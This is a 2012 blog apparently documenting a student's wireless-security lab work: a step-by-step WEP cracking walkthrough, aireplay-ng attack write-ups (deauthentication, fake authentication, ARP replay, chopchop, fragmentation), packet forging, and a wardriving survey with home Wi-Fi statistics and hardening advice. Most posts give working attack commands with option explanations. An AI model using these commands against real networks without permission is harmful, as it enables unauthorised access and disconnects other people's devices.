Wednesday, February 29, 2012

Simple WEP Crack Example


Simple WEP Crack with Client



Overview of steps taken:


1.      Start card in monitor mode with airmon-ng

2.      Search for available networks using airodump-ng

3.      Find victim network and gather info.

4.      Disable monitor mode and re-enable in victim channel

5.      Start airodump-ng

6.      Fake auth your card to network (not required but recommended)

7.      start ARP replay using aireplay-ng -3 to quickly collect IVs

8.      To find ARP request packet faster….use  aireplay-ng -0 to deauth a client connected to network. (your fake auth will NOT work)

9.      use aircrack-ng to crack WEP key (keep trying every 5k IVs if fail)


First we run airmon-ng to see our current wireless interfaces.


airmon-ng

If you have any VAPs running kill them with the airmon-ng stop command. Now start up a new VAP in monitor mode.


airmon-ng start wlan0






With monitor mode enabled on mon0, we can use that interface to look for our target network.



airodump-ng mon0










Take note of the following:

·        Target network ESSID
·        BSSID
·        Connected STA MAC address
·        Channel #
·        Using WEP encryption


Now that we have gathered our information we can kill our current VAP and start it on the correct channel.






airmon-ng stop mon0

airmon-ng start wlan0









Let’s start airodump again but filter it out for our target network and specify the output file.



airodump-ng –c 1 –bssid 58:6D:8F:74:40:9B –w example mon0



Let this session of airodump run in the background so we can capture the IVs generated.




To speed up the IV generation, we should first fake auth to the AP. Get your wireless card’s MAC address with the ifconfig command.


ifconfig


Fake auth to the victim AP.



aireplay-ng -1 60 –e Buddy –a 58:6D:8F:74:40:9B –h 00:C0:CA:32:3D:85 mon0


Let the fake auth run in the background. Open a new terminal and use the ARP replay attack to quickly generate IVs.




aireplay-ng -3 –b 58:6D:8F:74:40:9B –h 00:23:15:99:2D:1C mon0

As you wait for aireplay to search for an ARP request packet, open a new terminal and try to speed up the process by using a deauth attack against the connected STA.



aireplay-ng -0 5 –a  58:6D:8F:74:40:9B –c 00:23:15:99:2D:1C mon0



Keep attempting to deauth or wait for aireplay to get an ARP request packet. Once you get and ARP request packet, aireplay will automatically start injecting the packets. This is a successful output from an aireplay ARP request replay attack:


Let your attack continue to inject packets while you watch the number of IVs climb on airodump. Once you have a fair amount of IVs, you can attempt to crack the key.
Open a new terminal and type:


aircrack-ng -0 example*.cap





Success! You can now use the decrypted WEP key to get on the wireless network. If unsuccessful, continue to attempt cracking every 5,000 IVs captured.


Lab Video:




Friday, February 17, 2012

Wardriving Experience w/ Results

With my Geek hat on, I hit the road and went "wardriving". I have never gone wardriving before but it was a long needed break from my studies and wireless exploit videos.

While I was creating my wireless exploit videos I started to wonder how releavent it really was. I began researching for data on wireless networks. I found a few hits but they were either too old or not vendor neutral. The curiousity was killing me so I gathered my gear and took the initiative myself. My primary goal was to gather as much information as I could and decipher it later.

My setup was very simple. I had my fully charged laptop with a Backtrack 5 R1 vm installed. With BT I used Kismet as the software to capture raw 802.11 frames. I used my Alfa AQUS051NG wireless card with a 9dbi antenna for high gain wireless monitoring. And of course, I had my car.

The initial drive itself was a lot of fun. I decided to drive in a suburban area. I chose this because I was interested in home 802.11 usage rather than buisness usage. (perhaps I can do another run for buisness wifi) After the fun, I went home to see what I was able to capture.

I used wireshark to analyze the packet dump:

Date: Sat. Feb. 11th

Elapsed time: 00 hrs 58min 06 sec

Captured file size: 1,757 KB
Packets captured: 9417

My elapsed time was pretty short but I still gathered a lot of information. After looking at the kismet log files I was able to gather some more information.

Total APs: 1473

Total STAs: 8104

The amount of STAs (stations) is much higher than the total number of APs (access points). However, this ratio doesn't surprise me with the number of mobile device users increasing daily. Just because I captured so many STAs doesn't mean they are connected to any AP. I assume that a good portion of those STAs are phones with the wifi left on. The graphic below illustrates the ratio.


Now that I know how many and what I am dealing with I can dive deeper into the data I captured. The first thing that spiked my interest was what type of encryption home users have if any? I looked into the kismet log file to search for strings of text that matched each type of encryption. One thing I noticed right away is that way too many people are using WEP encryption. 12.6% of home users are still using WEP but this still wasn't as scary as the 27.69% of them who had NO encryption at all. This is scary because anybody can come onto their network and poke around.



After seeing the multiple security threats I was curious to see how many people have their APs set up with default SSIDs. Again I searched the common default SSIDs in the kismet log file. I looked for the big ones such as: linksys, belkin, myqwest, and actiontec. While I was at it I also was curious to see how many took the extra step and configured their AP to hide the SSID.


The first thing I found is that a "myqwestxxx" address (ex. myqwest324) is very popular. This is not surprising because Qwest, or now called CenturyLink, is a common service provider in my area. The disturbing thing about it is that Qwest cleary does not inform, or attempt to change, the default SSID. And if there is a default SSID, it is a safe assumption that the default username and password will be used to remotely log on to the wireless router.

You might also notice that the amount of Hidden SSIDs. 8.69% of home users took the extra step to hide their SSID. I just hope that most of them took further security measures. Just because an SSID is hidden does not mean it cannot be quickly retrieved.

The next thing I harvested from my war driving data was the channel number used. The statistics I got was interesting. Because channels 1, 6, and 11 do not overlap they are used by different manufacturers as a default channel. In the chart below you will notice that almost all the channels are on 1, 6, or 11. If these channels were all left default, then 79.25% of home users stayed on their default channel.To avoid overlapping with your neighbors wireless, scan to see what channel they are on and configure yours away from it.





The last graph I have is about the wireless chipset manufacturers. This graph shows that Cisco and Netgear easily dominate the wireless world. I searched for strings of text that included the manufacturers name so this data includes both clients and access points.



Even though my data was limited, I am confident enough to say that I have a pretty good feel on how home users deploy their wifi. The amount of wireless data I was able to capture in just under an hour is ridiculous. I cannot imagine how many networks I could get in a whole day.

If you take anything from this, I hope it is that you see the need to secure your wireless network. It was very easy, affordable, and fast for me to gather this data. With more sophisticated equipment, an attacker could easily penetrate your wireless network from very far away. Kismet is even capable of matching discovered networks with a location if you have a gps card.

Wireless is fun, but my advice is simply to avoid it. Use a wired network anytime you can. If you need to go mobile, look into a 3G or 4G solution. The security is much better than wifi. And if you must use wifi, look into a VPN solution (especially if you are in a public hotspot), set up WPA2 personal encryption at minimum with a COMPLICATED passphrase at home, and make sure you are using an AV and firewall on your PC.


Packetforge-ng -ARP request packet


Packetforge-ng: Creating an ARP packet

            We will be using the tool packetforge-ng to forge an ARP packet to inject into a wireless network. (packetforge-ng can be used to forge any type of packet) To forge our packet we will need the packet PGRA key stream file obtained via the chopchop attack or a fragmentation attack.

            Getting the PGRA key stream and creating a packet with packetforge-ng is used when there is no client connected to the AP. By forging and injecting an ARP packet, we can generate the IVs need to crack the WEP key.


To create our ARP packet:

Ex.

packetforge-ng -0 –a 00:0C:41:F2:AC:F0 -h  00:23:15:99:2D:1E -k 255.255.255.255 

-l 255.255.255.255 -y pgra.xor –w my-arp-packet


·        -0 will create an ARP packet
·        -a is the BSSID
·        -h is the source MAC address (fake auth if you are using your own)
·        -k is the destination IP (255.255.255.255 will work with most APs)
·        -l is the source IP (255.255.255.255 will work with most APs)
·        -y asks for the location of your .xor file obtained from chopchop or fragmentation
·        -w will name the ARP packet you are creating. The packet will be saved in the directory you launched packetforge-ng




            With the packet successfully forged, we can continue to inject the packet. To inject we simply use our interactive packet replay attack. We call on our forged packet with the –r option.


Ex.

aireplay-ng -2 –r my-arp-packet mon0



            Enter “y” to select our forged packet and start injecting! Run airodump-ng to capture the IVs and eventually crack the WEP key.

Video:

Sunday, February 12, 2012

Aireplay-ng Videos

Videos to go with the previous aireplay-ng examples.


Deauth:

Fake auth:

Interactive Packet Replay:


ARP Request Replay:
KoreK chopchop:
Fragmentation attack:

Aireplay-ng attacks


Attack 9: Injection Test

This option is used for testing rather than attacking. Not all wireless chipsets support packet ‘injection’. Test if your chipset supports packet injection.

Ex..

aireplay-ng -9 mon0


If an AP is found, aireplay-ng will test injection and give you the output. This is why you bought a specific wireless card that supports injection. You will see how powerful injection can be in later attacks.



Attack 0: Deauthentication

Deauthentication simply kicks clients off of the wireless network. This is useful because when the client reconnects, they often generate an ARP request. (note: you cannot deauth your fake authed card to obtain an ARP request.) In WEP cracking, ARP requests are used to inject and quickly generate IVs. The attack can also force a client to give up the WPA/WPA2 handshake for cracking. Deauth will force a client to give up a hidden ESSID.

            Unlike others, this attack specifically targets the STA (client). If you have issues with this attack make sure you are close enough to the STA.

            This attack requires that you are in monitor mode and that a client is connected to the network you are attacking.


Ex.

aireplay-ng -0 2 –e “jake” –a 00:0C:41:F2:AC:F0 –c 00:23:15:99:2D:1E mon0

o   -0 is the deauth attack

o   2 is the # of deauths you wish to send---0 means infinite

o   -e is the ESSID of the target network

o   -a is the BSSID of the target network

o   -c is the STA or client MAC address of the target network---not using –c will send a deauth to all connected clients.

o   mon0 is the interface used


Attack 1: Fake Authentication

Fake authentication is used to connect to WEP networks. Fake authentication does not mean you have the WEP key and doesn’t mean you bypassed it. It simply means that the AP will accept your MAC address. This is useful when there are no other connected STAs. Fake authentication will not generate any ARP requests.

            The biggest reason why injection attacks fail is because you are not associated with the AP. Using the fake authentication attack solves this problem.

***If your fake auth always fails, MAC address filtering may be enabled***

Ex.

aireplay-ng -1 5 –e “jake” –a 00:0C:41:F2:AC:F0 –h 00:C0:CA:32:3D:85 mon0

·        -1 is the fake auth attack

·        5 is the time in seconds to re-associate. Longer times allow for keep alive packets to be sent, resulting in more traffic.

·        -e is the ESSID of the target network

·        -a is the BSSID of the target network

·        -h is your MAC address

·        mon0 is the interface being used


Issues:

1.      Make sure you are close to the AP

2.      Make sure you are on the same channel as the AP

3.      You can only fake auth to networks using WEP.

4.      Make sure your –a and –h options are correct

5.      If you are using macchanger, check to see if your changed MAC is realistic.



Attack 2: Interactive Packet Replay

            Interactive Packet Replay is used to replay packets and quickly generate IVs for WEP cracking. The tool will grab a packet you want off the network and replay it back to the AP. While any packet can be replayed back, not all of them will successfully generate IVs.

            A certain packet will generate IVs on all access points. This is an ARP request packet. Because the AP sees these packets all the time, it will have no problem replaying it back. Before we successfully replay an ARP request packet we have to know what the packet entails.


            An ARP request packet has the following unique fields:

§  A broadcast destination MAC address of FF:FF:FF:FF:FF:FF

§  The packet will be traveling from a wireless client to the wired network. (the TO DS flag will be set to “1”)

To have aireplay-ng filter out these unique qualities of an ARP request packet we need to use the following options:

·        -d FF:FF:FF:FF:FF:FF

·        -t 1


Before we run this attack we need to fake authenticate first. We also need a client connected to our network to generate the initial ARP request packet. (remember we cannot generate an ARP request from our fake auth) After a successful fake auth, we can begin our packet replay. If you plan to crack the WEP key, make sure to run airodump-ng to capture the IVs you generate.


Ex.

aireplay-ng -2  –b 00:0C:41:F2:AC:F0 -d FF:FF:FF:FF:FF:FF –t 1 mon0


·        -2 will specify the interactive replay attack

·        -b is for the BSSID

·        -d is the destination MAC we are looking for

·        -t 1 will set the TO DS flag bit to 1

·        mon0 is the interface we are using


When the command is run it will look like above. If you look at the packet aireplay-ng grabbed, it is exactly what we filtered out. (try using deauth to force a client to send out an ARP request packet)

Press “y” and enter to use this packet. If you choose “no” aireplay-ng will continue to look for packets.




Aireplay-ng will begin replaying the packet you selected. The smaller the packet size, the faster you will generate IVs.

If you are having issues finding the right packet to inject, try the modified packet replay method. This method is very similar but instead of grabbing a real packet it will modify a packet to act like an ARP request packet.

Ex.

aireplay-ng -2  –b 00:0C:41:F2:AC:F0 –t 1 -d FF:FF:FF:FF:FF:FF  -p0841 mon0

·        -p 0841 will set the Frame control field to make the packet seem as though it’s being sent from a wireless client

·        See above example for explanations on the other options



Attack 3: ARP Request Replay Attack


The best way to generate new IVs is to use the ARP request replay attack. This attack is the most reliable and is the attack I prefer to use over interactive packet replay. The attack simply captures an ARP packet and automatically repeats it to the AP you specify. Because it is an ARP request packet, the AP will retransmit the packet and generate a new IV each time it does so. This allows us to capture a large amount of IVs very quickly for later WEP cracking.

This attack is used on a WEP encrypted network. It requires that you have your card in monitor mode. We need a client on the victim network for this attack to be successful because somebody needs to generate the initial ARP request packet. It is recommended that you run airodump-ng to capture the IVs you generate.


Ex.


aireplay-ng -3 –b 00:0C:41:F2:AC:F0 –h 00:23:15:99:2D:1E mon0

o   -3 specifies the ARP Request Replay Attack

o   -b is the BSSID

o   -h is the source MAC address. This address can be a connected client or our address from fake auth.

o   mon0 is the interface used




Attack 4: KoreK chopchop attack


            The KoreK chopchop attack is used to decrypt WEP encrypted packets. This attack will get the PGRA stream XOR file which is used to decrypt the WEP packets. This is often used with packetforge-ng to forge packets used for injection, but can also be used with wireshark to view decrypted packets. It is important to understand that the chopchop attack DOES NOT reveal the WEP key.

            Note that not all APs are vulnerable to this attack and that it is much slower than the fragmentation attack. However, unlike the fragmentation attack, you do not need to know any IP addresses for a successful chopchop attack.

            Before we attack, we should fake auth with the AP so the frames we send from our card are not dropped.


Ex.

aireplay-ng -4 –h 00:C0:CA:32:3D:85 –b 00:0C:41:F2:AC:F0 mon0

·        -4 specifies the chopchop attack

·        -h is the our MAC used in fake auth

·        -b is the BSSID

·        mon0 is the interface used


Aireplay-ng will begin to read packets. Once you find a packet you wish to decrypt, hit “y” to continue.



The attack can take some time. After it is complete the XOR file will be saved in the directory you launched the attack from. This XOR file can then be used with packetforge-ng and later injected.



Attack 5: Fragmentation Attack

            The fragmentation attack will also get the PGRA stream XOR file. This file is used to decrypt packets and is also necessary to create packets with packetforge-ng. This attack is often faster and more successful compared to the chopchop attack.

            This attack requires that you set the destination and source IP address. If you do not specify a source or destination IP, it will default them both to 255.255.255.255. Lucky for us, most APs will accept this as valid. Because this attack sends out a large number of packets, good signal quality with the AP is important before you start this attack.

Fake auth your card before this attack.

Ex.


aireplay-ng -5 –b 00:0C:41:F2:AC:F0 –h 00:C0:CA:32:3D:85 mon0

·        -5 chooses the fragmentation attack

·        -b is the BSSID

·        -h is your MAC from fake auth

·        mon0 is the interface used


Optional filter arguments:


·        -k set the destination IP address (default is 255.255.255.255 if unset)

·        -l set the source IP address (default is 255.255.255.255 if unset)

·        -m sets minimum packet length

·        -n sets the maximum packet length




Aireplay-ng will begin to read packets. Once you find a packet you wish to decrypt, hit “y” to continue. Remember that the smaller the packet, the faster your injection speed will be.




            This is a successful fragmentation attack. Aireplay-ng saved the output into the “fragment-01130-203902.xor” file. This file is located in your current directory and can be used later to create a packet using packetforge-ng.










Wednesday, February 8, 2012

Aireplay-ng


Aireplay-ng


Aireplay-ng is my favorite tool of all. It has a variety of functions but all of them are used to speed up attacks.


Different attacks:


Usage:

aireplay-ng <options> <interface>

Here are some basic options. More options will be covered with each specific attack. (replay attacks require different options)

·        -b         BSSID
·        -s         source MAC

I will be posting each attack on its own.

Tuesday, February 7, 2012

Using airodump-ng


Airodump-ng


Airodump-ng is primarily used for capturing 802.11 frames over the air. Airodump-ng displays APs and STAs of nearby networks.

usage: airodump-ng <options> <interface>

Common options:

Options:
Description:
-w       
writes output to specified file in pcap format
- -bssid           
filters APs for specified BSSID
-c        
filters out networks for a specified channel


Airodump-ng output is filled with a lot of useful information about discovered networks. Notice the example output below:



In the header fields you will notice the channel, elapsed time and date. If you do not specify the channel, airodump-ng will hop channels.

The upper half shows the APs that have been discovered. Here are the descriptions of the fields shown:

BSSID: MAC of the AP.

PWR: Signal strength of the AP. (-25 is a strong connection where -80 is weak)

Beacons: # of beacons the AP sends.

#Data: Amount of captured data packets. This is also the number of IVs if you are attacking WEP.

#/s: Data packet captures per second

CH: Channel the AP is operating on.

MB: Speed that AP supports.

ENC: Type of encryption the AP is using. Options include: OPN, WPA, WPA2, WEP, WEP? (encryption but not enough data to specify)

CIPHER: The cipher used for encryption

ESSID: Broadcasted name of the AP. If hidden, this field will provide the ESSID length or remain empty.

The lower half of the airodump-ng output displays the connect STAs.

            STATION: MAC of the STA.

            Rate: Speed that the STA supports.

            Lost: Amount of packets lost by the STA over the last 10 seconds.

            Packets: Amount of packets sent by the STA.

            Probes: The ESSID probed by the STA.


Airodump-ng is going to be used for almost all of our wireless attacks. Get familiar with the tool and its output fields.


See the airodump-ng video for more practical usage and tips on using airodump-ng.